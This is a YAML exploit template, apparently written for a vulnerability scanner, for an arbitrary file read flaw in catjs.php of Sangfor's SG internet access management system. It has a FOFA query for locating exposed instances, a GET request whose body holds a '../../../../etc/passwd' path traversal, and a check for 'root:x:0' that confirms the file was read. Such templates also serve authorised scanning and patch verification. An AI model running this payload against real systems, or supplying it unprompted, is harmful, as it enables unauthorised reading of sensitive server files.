product: 深信服SG上网优化管理系统
vName: 深信服SG上网优化管理系统 catjs.php任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 深信服 SG上网优化管理系统 catjs.php 存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器上的敏感文件
version: ''
note: ''
search:
  FOFA: app="SANGFOR-上网优化管理"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17666447.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /php/catjs.php
      data: '["../../../../../../etc/passwd"]'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and